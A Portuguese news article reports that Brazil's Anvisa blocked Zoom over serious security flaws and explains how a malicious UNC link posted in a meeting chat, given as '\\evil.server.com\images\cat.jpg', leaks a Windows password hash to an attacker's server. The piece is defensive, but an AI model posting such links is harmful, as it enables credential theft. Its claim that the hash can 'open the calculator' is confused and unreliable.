Anvisa bloqueia app Zoom por ‘falhas gravíssimas de segurança’
Saiba o que precisa ser feito para evitar ações de hackers caso use o Zoom para uma vídeo conferência
A Agência Nacional de Vigilância Sanitária (Anvisa) decidiu bloquear o app Zoom de sua rede de computadores por conter “falhas de segurança gravíssimas “. O aviso aos funcionários foi dado via e-mail, no último sábado.
“Recentemente foram encontradas falhas gravíssimas de segurança na ferramenta de videoconferência Zoom. Essas falhas podem, por exemplo, permitir o acesso não autorizado à câmera e ao microfone, o roubo de usuário e da senha de acesso, bem como a coleta e envio de informação das ligações”, dizia o e-mail interno.
A agência recomendou que os funcionários desinstalassem imediatamente o aplicativo de computadores, celulares e tablets, e alterassem as senhas.
Como se precaver da ação de hackers usando o app Zoom
Segundo o portal Bleeping Computer, a invasão não acontece por magica. Primeiro o invasor tem que ter acesso a chamada que está acontecendo, em seguida ele tem que postar um link malicioso no chat, algo como (\\evil.server.com\images\cat.jpg), e se alguém clicar nesse link, o dono do evil.server.com irá receber um hash da sua senha do Windows. Uma hash é a sua senha encriptada.
Essa senha pode ser usada para abrir a calculadora ou roubar dados, então para usuários basta não clicar em qualquer coisa no chat.
O administrador da conversa ainda pode habilitar a função onde só entram na sala quem ele aprova, dessa forma ninguém indevido irá acessar. Para mais informações, clique aqui.